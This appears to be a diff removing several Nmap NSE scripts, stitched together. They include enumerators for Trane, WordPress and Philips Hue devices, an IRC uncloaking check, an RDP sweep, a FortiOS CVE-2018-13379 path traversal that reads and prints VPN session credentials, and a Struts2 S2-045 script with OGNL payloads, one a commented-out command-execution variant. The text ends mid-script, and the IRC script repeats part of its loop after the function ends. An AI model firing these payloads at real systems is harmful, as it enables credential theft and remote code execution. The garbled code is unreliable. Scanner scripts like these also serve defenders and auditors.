author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}
portrule = shortport.portnumber({80})
local output = stdnse.output_table()
local outputcol = "\nuserId, firstName, lastName, phoneNo, email, administrator, active,\n"
local count = 1
local function GetUserInfo(host, port, usernumber)
--Get information from /evox/user/user/#usernumber#
local uri = '/evox/user/user/'..usernumber
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify response and parsing of XML /evox/user/user/#usernumber#
local xmlparsetest = response['body']:match('userId')
if not xmlparsetest then
stdnse.debug1("Problem with XML parsing. No users found in /evox/user/user")
return nil, "Problem with XML parsing. No users found in /evox/user/user"
end
if response['status-line'] and response['status-line']:match("401") then
stdnse.debug1("401 Unauthorized")
return nil, "401 Unauthorized"
end
local keylist = {"userId","firstName","lastName","phoneNo","email", "administrator","active"}
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[count..":"..key] = response['body']:match(key..'" val=([^<]*) />')
output[count..":"..key] = string.gsub(output[count..":"..key],'"',"")
outputcol = outputcol..output[count..":"..key]..', '
stdnse.debug1("Found : "..output[count..":"..key])
end
count = count + 1
outputcol = outputcol .. '\n'
end
end
local function GetInformation(host, port)
--Get information from /evox/user/user
local uri = '/evox/user/user'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify response and parsing of XML from /evox/user/user
local xmlparsetest = response['body']:match('<ref href="([^<]*)/" is="trane:SC/user/user')
if not xmlparsetest then
stdnse.debug1("Problem with XML parsing. No users found in /evox/user/user")
return nil, "Problem with XML parsing. No users found in /evox/user/user"
end
if response['status-line'] and response['status-line']:match("401") then
stdnse.debug1("401 Unauthorized")
return nil, "401 Unauthorized"
end
--Parse information from /evox/user/user to get usernumbers
local _,lastuser = response['body']:find(".*trane:SC/user/user_")
stdnse.debug1("lastuser : "..lastuser)
local count = 0
local nextuser = 1
while nextuser < lastuser do
stdnse.debug1("lastuser : "..lastuser)
output["usernumber"] = response['body']:match('<ref href="([^<]*)/" is="trane:SC/user/user',nextuser)
if output["usernumber"] == nil then
output["usernumber"] = "Not available"
else
stdnse.debug1("Found : "..output["usernumber"])
GetUserInfo(host, port, output["usernumber"])
end
_,nextuser = response['body']:find("trane:SC/user/user_",nextuser)
stdnse.debug1("nextuser : "..nextuser)
count = count + 1
stdnse.debug1("Count : "..count)
end
end
return outputcol
end
action = function(host,port)
-- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
local status_404, result_404, _ = http.identify_404(host,port)
if ( status_404 and result_404 == 200 ) then
stdnse.debug1("Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.", host.ip, port.number)
return nil
end
return GetInformation(host, port)
end


@ -1,129 +0,0 @@
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local nsedebug = require('nsedebug')
description = [[
Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow
an unauthenticated attacker to download FortiOS system files.
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script
will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).
]]
---
-- @usage nmap -p 10443 --script http-vuln-cve2018-13379 <host>
--
-- @output
-- PORT STATE SERVICE REASON
-- 10443/tcp open ssl/http Fortinet SSL VPN
-- | CVE-2018-13379:
-- | VULNERABLE:
-- | FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE-2018-13379
-- | Description:
-- | Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow
-- | an unauthenticated attacker to download FortiOS system files.
-- |
-- | FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script
-- | will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
-- | This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
-- |
-- | Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).
-- | Disclosure date: 24-05-2019
-- | References:
-- | https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
-- |_ https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
--
-- @xmloutput
-- <table key="CVE-2018-13379">
-- <elem key="title">FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem> FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.&#xa; This script will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).&#xa; This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).&#xa;&#xa; Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).&#xa; </elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="month">05</elem>
-- <elem key="day">24</elem>
-- <elem key="year">2019</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2019-05-24</elem>
-- <table key="refs">
-- <elem>https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html</elem>
-- <elem>https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf</elem>
-- </table>
-- </table>
---
author = {"Asahel Hernandez (Blazz3) <theblazz3@gmail.com>"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln","safe"}
portrule = shortport.http
action = function(host, port)
local vuln = {
title = 'FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure',
state = vulns.STATE.NOT_VULN, -- default
description = [[
Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow
an unauthenticated attacker to download FortiOS system files.
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script
will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).
]],
IDS = {CVE = 'CVE-2018-13379'},
references = {
'https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf',
'https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html'
},
dates = {
disclosure = {year = '2019', month = '05', day = '24'},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
local response = http.get(host, port, tostring(path))
local body = response.body
--local fbody = body:gsub("%z", ".")
--stdnse.debug1("Body: %s", fbody)
if response.status == 200 and http.response_contains(response, "var fgt_lang =") then
stdnse.debug1("Vulnerable!")
vuln.state = vulns.STATE.VULN
local extra_info = body:gsub("[^\x20-\x7E]", ".")
local extra_info2 = extra_info:gsub("%.+", "\n")
local f = ""
local t = {}
for i in extra_info2:gmatch("%w+") do
t[#t + 1] = i
end
for k,v in ipairs(t) do
if string.len(v) > 5 then
if not (string.match(v, "Soprema") and string.match(v, "WebSSLSoprema")) then
f = f..v.."\n"
end
end
end
vuln.extra_info = "Snippet from configuration file:\n"..f
else
vuln.state = vulns.STATE.NOT_VULN
stdnse.debug1("Not Vulnerable...")
end
return report:make_output(vuln)
end


@ -1,141 +0,0 @@
local http = require "http"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
description = [[
Enumerates URLs of uploaded media and pages in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability.
$ git clone https://github.com/hkm/nmap-nse-scripts.git
Original advisory:
* http://blog.whitehatsec.com/information-leakage-in-wordpress/#.Ueig9m0_yms
]]
---
-- @usage
-- nmap -p80 --script http-wordpress-attachment <target>
-- nmap -sV --script http-wordpress-attachment --script-args limit=1000 <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-wordpress-attachment:
-- | URL: http://www.hakim.ws/calendario/
-- | URL: http://www.hakim.ws/2010/12/noticias-anteriores-al-201/
-- |_Search stopped at ID #25. Increase the upper limit if necessary with '--script-args limit=1000'
--
-- @args http-wordpress-attachment.limit Upper limit for ID search. Default: 100
-- @args http-wordpress-attachment.basepath Base path to Wordpress. Default: /
-- @args http-wordpress-attachment.out If set it saves the URL list in this file.
---
author = "Pedro Joaquin based on Paulino Calderon http-wordpress-enum"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"auth", "intrusive", "vuln"}
portrule = shortport.http
---
-- Returns the URL extracted from the Location corresponding to the attachment_id passed
-- If attachment_id doesn't exists returns false
-- @param host Host table
-- @param port Port table
-- @param path Base path to WP
-- @param id Attachment id
-- @return false if not found otherwise it returns the username
---
local function get_wp_url(host, port, path, id)
stdnse.print_debug(2, "%s: Trying to get URL with attachment_id %s", SCRIPT_NAME, id)
local req = http.get(host, port, path.."?attachment_id="..id, {no_cache = true, redirect_ok = false})
if req.status == 301 then
if string.find(req.header.location, "attachment_id") == nil then
stdnse.print_debug(1, "Attachment_id #%s returned %s", id, req.header.location)
return req.header.location
end
end
return false
end
---
--Returns true if WP installation exists.
--We assume an installation exists if wp-content is found in body of index.php
--@param host Host table
--@param port Port table
--@param path Path to WP
--@return True if 404 page contains string wp-content
--
local function check_wp(host, port, path)
stdnse.print_debug(2, "Checking wp-content in body")
local req = http.get(host, port, path..math.random(1, 99999999), {no_cache = true})
if req.status == 404 then
if string.find(tostring(req.body), "wp%-content") ~= nil then
stdnse.print_debug(1, "Wordpress installation detected. String wp-content found in 404 body")
return true
end
end
return false
end
---
--Writes string to file
--Taken from: hostmap.nse
--@param filename Target filename
--@param contents String to save
--@return true when successful
local function write_file(filename, contents)
local f, err = io.open(filename, "w")
if not f then
return f, err
end
f:write(contents)
f:close()
return true
end
---
--MAIN
---
action = function(host, port)
local basepath = stdnse.get_script_args("http-wordpress-attachment.basepath") or "/"
local limit = stdnse.get_script_args("http-wordpress-attachment.limit") or 100
local filewrite = stdnse.get_script_args("http-wordpress-attachment.out")
local output = {""}
local users = {}
--First, we check this is WP
if not(check_wp(host, port, basepath)) then
if nmap.verbosity() >= 2 then
return "[Error] Wordpress installation was not found. We couldn't find wp-content"
else
return
end
end
--Incrementing ids to enum URLs
for i=1, tonumber(limit) do
local user = get_wp_url(host, port, basepath, i)
if user then
output[#output+1] = string.format("URL: %s", user)
users[#users+1] = user
end
end
if filewrite and #users>0 then
local status, err = write_file(filewrite, stdnse.strjoin("\n", users))
if status then
output[#output+1] = string.format("URLs saved to %s\n", filewrite)
else
output[#output+1] = string.format("Error saving %s: %s\n", filewrite, err)
end
end
if #output > 1 then
output[#output+1] = string.format("Search stopped at ID #%s. Increase the upper limit if necessary with 'http-wordpress-attachment.limit'", limit)
return stdnse.strjoin("\n", output)
end
end


@ -1,115 +0,0 @@
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
description = [[
Stores the results of an HTTP(S) scan on a HTML page with JQuery. Shows IP, header,
realm and tries to identify if target is a router, camera or common web server.
Almacena los resultados de un barrido HTTP(S) en una página web con Frames y JQuery.
Muestra las direcciones IP, un mirror del contenido html, el contenido de la cabecera
www-authenticate. De acuerdo al header server o al contenido de la página que obtiene
muestra si es un router, cámara o firewall.
$ git clone https://github.com/hkm/nmap-nse-scripts.git
]]
author = {'Pedro Joaquin pjoaquin()websec.mx'}
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery"}
portrule = shortport.port_or_service({80, 443},
{"http", "https"})
local function categoria(server)
local modemlist = {'Router', 'Modem','RomPager', 'DSL', 'Mbedthis','Mathopd','GoAhead','IOS','httpd','siyou server','lighttpd','login.lp','ADTRAN','Technicolor','url_filter_hint.asp','RouterOS'}
for i=1, #modemlist do
if string.find(server, modemlist[i]) then return "Router" end
end
local camlist = {'dcs-lig-httpd', 'Camera', 'Avtech', 'Hikvision', 'iCanWebServer', 'Boa', 'AV-TECH','Cross Web Server','DCS-','netcam'}
for i=1, #camlist do
if string.find(server, camlist[i]) then return "Camera" end
end
local serverlist = {'Apache', 'IIS'}
for i=1, #serverlist do
if string.find(server, serverlist[i]) then return "Server" end
end
return "Unknown"
end
local function siexiste(var1)
if var1 == nil then
return ""
else
return var1
end
end
local function savefile(name, content, mode)
local file, err = io.open(name, mode)
if ( file ) then
file:write(content)
file:close()
else
return "\n ERROR: " .. file
end
end
savefile('httpframe_log.html', '<HTML><TITLE>httpframe.nse v0.5</TITLE><FRAMESET rows="390,*"><frame src="httpframe_log/menu.htm"><frame name="main" src="about:blank"></FRAMESET></HTML>', 'w')
savefile("httpframe_log/menu.htm", '<html><head><link href="../httpframe_files/advancedtable.css" rel="stylesheet" type="text/css" /><script src="../httpframe_files/jquery.js" type="text/javascript" language="javascript"></script><script src="../httpframe_files/advancedtable.js" type="text/javascript" language="javascript"></script><script language="javascript" type="text/javascript">'..
'$().ready(function() {'..
'$("#searchtable").show();'..
'$("#table1").advancedtable({rowsPerPage: 10000, searchField: "#search", loadElement: "#loader", searchCaseSensitive: false, ascImage: "../httpframe_files/images/up.png", descImage: "../httpframe_files/images/down.png",sortColumnDefault: 1, navigationLabel: "Paginas "});'..
'});'..
'</script></head><body>','w')
savefile("httpframe_log/menu.htm", '<table width="100%" class="normal" id="searchtable" border="0" cellspacing="4" cellpadding="0" style="display:none;"><tr>'..
'<td width="50%">Filter: <input name="search" type="text" id="search" style="display:none;" /></td>'..
'<td width="33%"><div id="loader" style="display:none;"><img src="httpframe_files/images/loader.gif" alt="Loading..." /></div></td>'..
'<td width="34%"><div style="float:right;padding:0"><a href=http://websec.mx><img src="../httpframe_files/images/logo.jpg" border=0></a></div></td>'..
'</tr></table>', 'a+')
savefile("httpframe_log/menu.htm", '<table id="table1" class="advancedtable" width="100%"><thead><th>IP</th><th>mirror</th><th>status</th><th>size</th><th>device</th><th>server</th><th>www-authenticate header</th><tbody>','a+')
action = function(host, port)
local query = http.get(host.ip, port, "/")
local serverstring = " "
if query.header['server'] ~= nil then serverstring = query.header['server'] end
if query.header['www-authenticate'] ~= nil then serverstring = serverstring .. query.header['www-authenticate'] end
if query.body ~= nil then savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w') end
if query.status == 302 then
serverstring = serverstring .. query.header['location']
savefile("httpframe_log/" .. host.ip .. ".html", "Location: "..query.header['location'], 'w')
end
if query.body ~= nil then
if string.find(query.body, ".location") then
serverstring=serverstring..query.body
query.body="<textarea cols=100 rows=40>"..query.body.."</textarea>"
savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w')
end
end
if port.service == "https" then
savefile("httpframe_log/menu.htm", '<tr class="'.. categoria(serverstring) ..'"><td width="10"><a href="'.. port.service ..'://' .. host.ip ..':' .. port.number ..'" target="main">'.. port.service ..'://' .. host.ip ..':' .. port.number ..'</a></td>', 'a+')
else
savefile("httpframe_log/menu.htm", '<tr class="'.. categoria(serverstring) ..'"><td width="10"><a href="http://' .. host.ip ..':' .. port.number ..'" target="main">http://' .. host.ip ..':' .. port.number ..'</a></td>', 'a+')
end
savefile("httpframe_log/menu.htm", '<td width="100"><a href="'.. host.ip .. '.html" target="main">[mirror]</a></td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="100">['.. siexiste(query.status) ..']&nbsp;</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="100">'.. string.len(siexiste(query.body)) ..' B</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="120">'.. siexiste(categoria(serverstring)) ..' &nbsp;</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="220">'.. siexiste(query.header['server']) ..' &nbsp;</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td>'.. siexiste(query.header['www-authenticate']) ..' &nbsp;</td>', 'a+')
return "Information added to httpframe_log.html "
end



@ -1,172 +0,0 @@
local comm = require "comm"
local math = require "math"
local nmap = require "nmap"
local pcre = require "pcre"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
-- Check http://irc.netsplit.de for IRC networks to scan..
description = [[
Detects if an IRC (Internet Relay Chat) network's services are affected by an IP address uncloaking weakness: http://decal.sdf.org/spotfedsonline
$ git clone https://github.com/decal/irc-uncloak-nse.git
$ cd /irc-uncloak-nse
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -p 6667 --script irc-uncloak.nse victim_host
]]
---
-- @output
-- 6667/tcp open irc
-- | irc-uncloak:
-- | svcserv: services.
-- | svcname: atheme 7.0.6. services. 03cfd743661f07975fa2f1220c5194cbaff4845
-- |_ svcweak: IRC services appear to be vulnerable to IP address uncloaking weakness
--@xmloutput
-- <elem key="svcserv">services.</elem>
-- <elem key="svcname">atheme 7.0.6. services. 03cfd743661f07975fa2f1220c5194cbaff4845</elem>
-- <elem key="svcweak">IRC services appear to be vulnerable to IP address uncloaking weakness</elem>
--
author = "Derek Callaway"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"default", "discovery", "safe"}
portrule = shortport.port_or_service({6666,6667,6697,6679},{"irc","ircs"})
local init = function()
-- Server part of WHOIS response
nmap.registry.ircserverinfo_312 = nmap.registry.ircserverinfo_312
or pcre.new("^:([\\w-_.]+) 312", 0, "C")
nmap.registry.ircserverinfo_375 = nmap.registry.ircserverinfo_375
or pcre.new("^:([\\w-_.]+) 375", 0, "C")
nmap.registry.ircserverinfo_422 = nmap.registry.ircserverinfo_422
or pcre.new("^:([\\w-_.]+) 422", 0, "C")
nmap.registry.ircserverinfo_433 = nmap.registry.ircserverinfo_433
or pcre.new("^:[\\w-_.]+ 433", 0, "C")
nmap.registry.ircserverinfo_ping = nmap.registry.ircserverinfo_ping
or pcre.new("^PING :(.+)", 0, "C")
nmap.registry.ircserverinfo_351 = nmap.registry.ircserverinfo_351
or pcre.new("^:[\\w-_.]+ 351 \\w+ ([^:]+)", 0, "C")
nmap.registry.ircserverinfo_error = nmap.registry.ircserverinfo_error
or pcre.new("^ERROR :(.*)", 0, "C")
end
action = function(host, port)
local sd = nmap.new_socket()
local curr_nick = random_nick()
local ssvcserv, ssvcname, ssvcweak, serr
local s, e, t
local buf
local banner_timeout = 60
local make_output = function()
local o = stdnse.output_table()
-- Latest versions of anope and atheme are vulnerable
if string.match(ssvcname:lower(), "anope") or string.match(ssvcname:lower(), "atheme") then
o["svcserv"] = ssvcserv
o["svcname"] = ssvcname
o["svcweak"] = "IRC services appear to be vulnerable to IP address uncloaking weakness"
end
return o
end
init()
local sd, line = comm.tryssl(host, port, "USER nmap +iw nmap :Nmap Wuz Here\nNICK " .. curr_nick .. "\n")
if not sd then return "Unable to open connection" end
sd:set_timeout(banner_timeout * 1000)
buf = stdnse.make_buffer(sd, "\r?\n")
while true do
if (not line) then break end
s, e, t = nmap.registry.ircserverinfo_375:exec(line, 0, 0)
if (s) then
sd:send("WHOIS ChanServ ChanServ\n")
end
s, e, t = nmap.registry.ircserverinfo_422:exec(line, 0, 0)
if (s) then
sd:send("WHOIS ChanServ ChanServ\n")
end
s, e, t = nmap.registry.ircserverinfo_433:exec(line, 0, 0)
if (s) then
curr_nick = random_nick()
sd:send("NICK " .. curr_nick .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_ping:exec(line, 0, 0)
if (s) then
sd:send("PONG :" .. string.sub(line, t[1], t[2]) .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_312:exec(line, 0, 0)
if (s) then
ssvcserv = string.sub(line, t[1], t[2])
sd:send("VERSION " .. ssvcserv .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_351:exec(line, 0, 0)
if (s) then
ssvcname = string.sub(line, t[1], t[2])
return make_output()
end
s, e, t = nmap.registry.ircserverinfo_error:exec(line, 0, 0)
if (s) then
serr = string.sub(line, t[1], t[2])
return make_output()
end
line = buf()
end
end
s, e, t = nmap.registry.ircserverinfo_312:exec(line, 0, 0)
if (s) then
ssvcserv = string.sub(line, t[1], t[2])
sd:send("VERSION " .. ssvcserv .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_351:exec(line, 0, 0)
if (s) then
ssvcname = string.sub(line, t[1], t[2])
return make_output()
end
s, e, t = nmap.registry.ircserverinfo_error:exec(line, 0, 0)
if (s) then
serr = string.sub(line, t[1], t[2])
return make_output()
end
line = buf()
end
end
random_nick = function()
local nick = ""
for i = 0, 8, 1 do
nick = nick .. string.char(math.random(97, 122))
end
return nick
end


@ -1,81 +0,0 @@
"""
Basic script to download and manage Nmap's official .nse scripts.
**Features:**
1. Download and update existing .nse scripts from Github.
2. Get basic usage info for any downloaded script.
"""
import re
import sys
import os
import requests
from datetime import datetime
import argparse
__scriptFolder = "nseScripts"
def updateDB():
extractionRe = re.compile(r'href="(\/nmap\/nmap\/blob\/master\/scripts\/.*?)".*?datetime="(.*?)Z', re.DOTALL)
nameRe = re.compile(r'scripts/(.*)')
gitPage = requests.get("https://github.com/nmap/nmap/tree/master/scripts")
reRes = re.findall(extractionRe, gitPage.content.decode("utf-8"))
fileDir = os.path.dirname(os.path.abspath(__file__))
if not os.path.isdir(__scriptFolder):
os.mkdir(os.path.join(fileDir, __scriptFolder))
fileDir = os.path.join(fileDir, __scriptFolder)
try:
for (httpDir, date) in reRes:
scriptName = re.search(nameRe, httpDir).group(1)
fileName = os.path.join(fileDir, scriptName)
url = "https://raw.githubusercontent.com" + httpDir.replace(r"/blob", "")
date = int(datetime.fromisoformat(date).timestamp())
if os.path.isfile(fileName):
if int(os.path.getmtime(fileName)) == date:
print(f"Skipping {scriptName}, unchanged")
continue
else:
print(f"Updating {scriptName}")
else:
print(f"Downloading {scriptName}")
subPage = requests.get(url)
with open(fileName, 'w') as f:
f.write(subPage.content.decode('utf-8'))
os.utime(fileName, (datetime.now().timestamp(), date))
except KeyboardInterrupt:
print("\nExitting..")
except:
print("An error occured")
return False
return True
def helper(fileName):
fileName = os.path.basename(fileName)
fileName = fileName.replace(".nse", "")
url = "https://nmap.org/nsedoc/scripts/" + fileName + ".html"
page = requests.get(url)
if "Error 404" in page.text:
print("Page does not exist. Make sure file name is correct")
return False
summaryRe = re.compile(r"User Summary.*?p>\n?(.*?)<\/p>", re.DOTALL)
summary = re.search(summaryRe, page.content.decode('utf-8')).group(1)
summary = re.sub(r"<.*?>", "", summary)
print(summary)
print(f"For more info visit {url}\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
allow_abbrev=False, description="Nmap .nse script manager")
parser.add_argument('--update', action='store_true',
help="Update nse script database")
parser.add_argument('--info', action='store',
type=str, metavar="file.nse",
help="Basic summary of script in database")
args = parser.parse_args()
if len(sys.argv) == 1:
print("At least one arguement is required, pass with -h for some help")
quit()
if args.update:
updateDB()
if args.info:
helper(args.info)


@ -1,76 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
local json = require "json"
description = [[
The Philips Hue is a wireless lighting system. This script obtains
information from the web API of the Philips Hue Bridge.
Tested on Philips Hue Bridge apiversion: 1.19.0 on 6/25/17.
References:
* http://websec.mx
* https://developers.meethue.com/philips-hue-api
]]
---
-- @usage nmap -p80 --script philipshue-info.nse <target>
--
-- @output
-- | phillipshue-info:
-- | bridgeid: 001788FFFE2F3F58
-- | swversion: 1705121051
-- | replacesbridgeid:
-- |
-- | datastoreversion: 61
-- | factorynew: false
-- | starterkitid:
-- | apiversion: 1.19.0
-- | modelid: BSB002
-- | mac: 00:17:88:2f:3f:58
-- |_ name: Philips hue
--
-- @xmloutput
-- <elem key="bridgeid">001788FFFE2F3F58</elem>
-- <elem key="swversion">1705121051</elem>
-- <elem key="datastoreversion">61</elem>
-- <elem key="factorynew">false</elem>
-- <elem key="starterkitid"></elem>
-- <elem key="apiversion">1.19.0</elem>
-- <elem key="modelid">BSB002</elem>
-- <elem key="mac">00:17:88:2f:3f:58</elem>
-- <elem key="name">Philips hue</elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discover", "version", "safe"}
portrule = shortport.portnumber(80)
local URI = '/api/config'
local function GetInformation(host, port)
local response = http.get(host, port, URI)
if response.body and response['body']:match("bridgeid") then
local stat, output = json.parse(response.body)
if stat then
return output
else
errmsg = "Error parsing JSON from "..URI.." response: "..output
end
else
errmsg = "No response or 'bridgeid' not found in response"
end
stdnse.debug1(errmsg)
return nil, errmsg
end
action = function(host,port)
return GetInformation(host, port)
end


@ -1,69 +0,0 @@
#!/bin/bash
#
# rdpScan - scan a network segment for RDP-Server
# author: silverstoneblue@gmx.net
# requires: fgrep awk nmap
scriptname="rdpScan"
version="1.0"
rdpips="/tmp/tmprdp.$$"
declare -i rdpfound=0
function is_installed {
which $1 > /dev/null 2>&1
if [ $? -ne 0 ]
then
printf "\nERROR: %s not installed.\n\n" $1
exit 255
fi
}
is_installed fgrep
is_installed awk
is_installed nmap
if [ $# -ne 1 ]; then
printf "\n \n"
printf "rdpScan - scan a network segment for RDP-Server \n\n"
printf "version %s by silverstoneblue@gmx.net \n\n" $version
printf "Usage: %s {target network}\n\n" $scriptname
printf "target network:\n"
printf " can pass hostnames, IP's, networks, etc.\n"
printf " server.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"
printf "example:\n"
printf " %s 80.187.0.0/24\n\n" $scriptname
exit 255
fi
iprange=$1
printf "\nScanning for RDP-Server..."
nmap -n -P0 -sS -p 3389 -oG - $iprange | fgrep 'Ports: 3389/open/tcp//ms-term-serv///' | awk '{print $2}' > $rdpips
printf "\n\n"
exec 3< $rdpips
echo "*****************"
echo "RDP IP Address"
echo "*****************"
while read rdpip <&3 ; do
rdpfound=$rdpfound+1
printf "%-15s %s\n" $rdpip
done
if [ $rdpfound -eq 0 ] ; then
printf "No RDP-Server found on network target %s. \n\n" $iprange
rm -f $rdpips
exit 255
fi
printf "\n%d RDP-Server found on network target %s.\n" $rdpfound $iprange
printf "Now try ur luck ;)\n"
printf "have fun ;) \n"
rm -f $rdpips
exit 0


@ -1,119 +0,0 @@
description = [[
Struts2 S2-045 Nmap Scan Script
# Struts2 S2-045 Vulnerabilities info
[CNNVD-2017-03-07](http://cnnvd.org.cn/notice/show/id/8230)
[CNTA-2017-0016](http://www.cnvd.org.cn/webinfo/show/4080)
[US-CERT](https://www.us-cert.gov/ncas/current-activity/2017/03/08/Apache-Software-Foundation-Releases-Security-Updates)
# Usage script
1、copy struts2-scan.nse to nmap script folder
2、run `nmap -script struts2-scan -sS -p 80,8080,81,82,83,84,85,86,87,88,8888,8088 -n -d ip -oX outscan.xml`
# Risk Awareness Report
[Struts2 S2-045 Risk Awareness Report](http://plcscan.org/blog/2017/03/struts2-s2-045-risk-awareness-report-from-beaconla
]]
---
-- nmap -script struts2-scan -sS -p 80,8080,81,82,83,84,85,86,87,88,8888,8088 -n -d ip -oX outscan.xml
--
-- BeaconLab http://plcscan.org/blog/
---
categories = {"discovery", "safe"}
author = "Z-0ne"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
local http = require "http"
local target = require "target"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
--use script to scan any open TCP port
portrule = function(host, port)
return port.state == "open"
end
action = function(host, port)
local output = stdnse.output_table()
local options
local payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('Struts2S2045Checks!!!')).(#o.close())}"
--local payload_cmd = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
local useragent = "Mozilla/5.0"
options = {header = {}, timeout = 15000}
options["header"]["Content-type"] = payload
options["header"]["User-Agent"] = useragent
local response = http.get(host, port, "/", options)
if response.status == 200 then
if string.find(response.body, "Struts2S2045Checks") ~= nil then
-- exclude index "php default phpinfo() page"
if string.find(response.body, "phpinfo") == nil then
--response: 0000 53 74 72 75 74 73 32 53 32 30 34 35 43 68 65 63 Struts2S2045Chec
-- 0010 6b 73 21 21 21 ks!!!
if #response.body == 21 then
output["status"] = "S2-045-AChecks vuln21"
return output
--response: 0000 53 74 72 75 74 73 32 53 32 30 34 35 43 68 65 63 Struts2S2045Chec
-- 0010 6b 73 21 21 21 0a ks!!!.
